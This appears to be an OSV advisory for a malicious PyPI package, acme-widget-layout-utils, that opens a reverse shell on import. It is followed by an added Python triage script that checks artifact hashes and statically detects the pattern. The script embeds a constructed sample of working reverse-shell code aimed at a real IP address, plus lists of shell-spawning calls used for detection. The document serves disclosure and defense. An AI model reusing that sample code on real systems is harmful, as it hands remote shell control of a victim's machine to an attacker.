{"id":"MAL-2026-5545","summary":"Malicious code in acme-widget-layout-utils (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600)\nOn first import, src/acme_widget_layout_utils/__init__.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin/stdout/stderr onto the socket via os.dup2, and execs /bin/sh -i — a textbook interactive reverse shell handing remote shell access to whoever controls 34.69.137.236. The behavior is unconditional and fires the moment any consumer runs `import acme_widget_layout_utils`. setup.py additionally installs a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, corroborating the package's role as a deliberately crafted attack artifact. The package name suggests benign UI/layout utilities and contains no such functionality; the pyproject.toml description openly self-identifies as a 'pentest C2 target', but the package is published on public PyPI under a generic name where any developer searching for widget/layout helpers can incidentally install and be backdoored. README's 'authorized pentest' framing does not change installer-side impact.\n\n## Source: kam193 (643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8)\nDuring import, the package starts a reverse shell.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-acme-widget-layout-utils\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.\n","modified":"2026-06-11T08:01:34.000735632Z","published":"2026-06-11T01:46:15Z","database_specific":{"malicious-packages-origins":[{"sha256":"42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600","import_time":"2026-06-11T02:24:27.554501614Z","id":"IN-MAL-2026-005357","modified_time":"2026-06-11T01:46:15Z","source":"amazon-inspector","versions":["0.0.3"]},{"id":"pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils","import_time":"2026-06-11T07:49:46.172073804Z","sha256":"643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8","modified_time":"2026-06-11T05:40:39.931561Z","source":"kam193","versions":["0.0.1","0.0.2","0.0.3"]}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/acme-widget-layout-utils/0.0.3/"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/acme-widget-layout-utils"}],"affected":[{"package":{"name":"acme-widget-layout-utils","ecosystem":"PyPI","purl":"pkg:pypi/acme-widget-layout-utils"},"versions":["0.0.3","0.0.1","0.0.2"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"611dbc535af11a1b91d66630e0f56d6a7a7174e74f46907fb8291d738448738c","tlsh":"c701cb8bcc2ad09a5f72a1918061c068de57a8031b3818b2bdec53146bf302561b4932","path":"src/acme_widget_layout_utils/__init__.py"},{"tlsh":"7fe02646983f7070ad9383a488b346121c23c6605bf0e2a674fe1a715f931e6cc478c3","sha256":"4ed96d4110ec206f50864acb834b2f11808cb903df3b39a876a3ebcf8fe66eea","path":"setup.py"},{"tlsh":"31e06823cb775965eac164446051a167cdf2e8d92dc0d85c8acfc9983cee0e9c6f8929","sha256":"1ed303a16226ddc822f2fb6d1d148805a1c09eb5577cfaa92220f7588902097f","path":"pyproject.toml"}],"package_integrity":[{"hashes":{"sha256":"6ac0e78622500c826abe1209dc38b736dc0efdbdf350de726cf61dcb7da7834a","blake2b_256":"38246aec6a745e8f7660a345797c632829f16c2f5b9bf30ea6ba2a19f9b11b53","md5":"f4295d1297c0cb74a638a3ad949d0817"},"filename":"acme_widget_layout_utils-0.0.3-py3-none-any.whl"},{"hashes":{"sha256":"58cea9e8965d0148962288648322bebcd4ddf5576169269981612a9c729bd233","blake2b_256":"a2a54dc0b1fd6fb75fd5d3f0d66ff1e64cfd2f20f72d07e275683859946b26d8","md5":"5bd41cffddaf6808608d6875b0a9dc38"},"filename":"acme_widget_layout_utils-0.0.3.tar.gz"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/acme-widget-layout-utils/MAL-2026-5545.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}
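Added triage example, not part of this OSV record, the ossf/malicious-packages repository, or the package itself: a small Python pre-install check that (a) hashes a downloaded artifact and compares it against the package_integrity sha256 values in the record, and (b) parses a module with `ast` to flag the import-time pattern the amazon-inspector source describes, namely a `connect()` to a literal host:port, `os.dup2` onto file descriptors 0, 1 and 2, and an exec of a shell, all at module level rather than inside a function body. The `SAMPLE_INIT` and `BENIGN_INIT` strings are constructed for the demonstration to mirror that description; they are not the package's real source. `SHELL_PATHS` and `EXEC_FUNCS` are assumptions about which calls count as spawning a shell.

```python
"""Pre-install triage for a PyPI artifact, keyed to the MAL-2026-5545 record:
hash-match downloaded files against the advisory and statically flag an
import-time reverse shell (connect + dup2 onto stdio + shell exec)."""
import ast
import hashlib

# sha256 values copied from the advisory's package_integrity list for 0.0.3
KNOWN_BAD_SHA256 = {
    "6ac0e78622500c826abe1209dc38b736dc0efdbdf350de726cf61dcb7da7834a",  # .whl
    "58cea9e8965d0148962288648322bebcd4ddf5576169269981612a9c729bd233",  # .tar.gz
}
STD_FDS = {0, 1, 2}
# Assumptions for this example: which calls and targets count as "spawning a shell".
SHELL_PATHS = {"/bin/sh", "/bin/bash", "/bin/zsh", "sh", "bash"}
EXEC_FUNCS = {"os.execv", "os.execve", "os.execvp", "os.execl", "os.execlp",
              "os.system", "subprocess.call", "subprocess.run",
              "subprocess.Popen", "pty.spawn"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_known_bad_hash(hexdigest: str) -> bool:
    """True when the artifact is one of the files the advisory lists."""
    return hexdigest.lower() in KNOWN_BAD_SHA256


def _dotted(func) -> str:
    """'os.dup2' for a Call's func node; '' for anything we cannot name."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _first_string(node):
    """String literal from a Constant, or from the first element of a list/tuple."""
    if isinstance(node, (ast.List, ast.Tuple)) and node.elts:
        node = node.elts[0]
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def _deferred_nodes(tree) -> set:
    """ids of nodes inside function/lambda bodies: they do not run on import."""
    deferred = set()
    for fn in ast.walk(tree):
        if isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            deferred.update(id(n) for n in ast.walk(fn))
    return deferred


def scan_source(src: str) -> dict:
    """Flag connect() + dup2(…, 0/1/2) + shell exec that execute at module level."""
    tree = ast.parse(src)
    deferred = _deferred_nodes(tree)
    report = {"connects": [], "dup2_fds": set(), "shell_execs": []}
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or id(node) in deferred:
            continue
        name, args = _dotted(node.func), node.args
        # sock.connect(("host", port)) with literal endpoint: record the C2 address
        if (name.endswith(".connect") and args and isinstance(args[0], ast.Tuple)
                and len(args[0].elts) == 2):
            host, port = args[0].elts
            if isinstance(host, ast.Constant) and isinstance(port, ast.Constant):
                report["connects"].append(f"{host.value}:{port.value}")
        # os.dup2(fd, 0|1|2): stdin/stdout/stderr redirected onto another descriptor
        elif (name == "os.dup2" and len(args) >= 2
                and isinstance(args[1], ast.Constant) and args[1].value in STD_FDS):
            report["dup2_fds"].add(args[1].value)
        # exec/spawn of an interactive shell
        elif name in EXEC_FUNCS and args and _first_string(args[0]) in SHELL_PATHS:
            report["shell_execs"].append(f"{name} {_first_string(args[0])}")
    report["import_time_reverse_shell"] = (
        bool(report["connects"]) and report["dup2_fds"] == STD_FDS
        and bool(report["shell_execs"]))
    return report


# Constructed sample mirroring the advisory's description; NOT the package's real source.
SAMPLE_INIT = '''
import os, socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("34.69.137.236", 80))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.execv("/bin/sh", ["/bin/sh", "-i"])
'''
# Constructed benign module: its only dup2 sits inside a function, so it is not import-time.
BENIGN_INIT = '''
import os
def align(widgets, width):
    return [w.ljust(width) for w in widgets]
def reopen_stderr(fd):
    os.dup2(fd, 2)
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_INIT), ("benign", BENIGN_INIT)):
        print(label, scan_source(src))
    print("empty file is known bad:", is_known_bad_hash(sha256_hex(b"")))
```

Run it against files from `pip download --no-deps --dest ./quarantine <name>` before any `pip install`, because the record notes a custom install command in setup.py that runs at install time, not just at import. A hit from `scan_source` is confirmation; a miss is not clearance: a host assembled at runtime, `getattr(os, "dup" + "2")`, or a base64-decoded `exec` all evade this literal-matching check, so pair it with a sandboxed import in an isolated network namespace. The hash check only matches the exact artifacts the record lists (0.0.3 here); 0.0.1 and 0.0.2 are also affected but carry no hashes in this record.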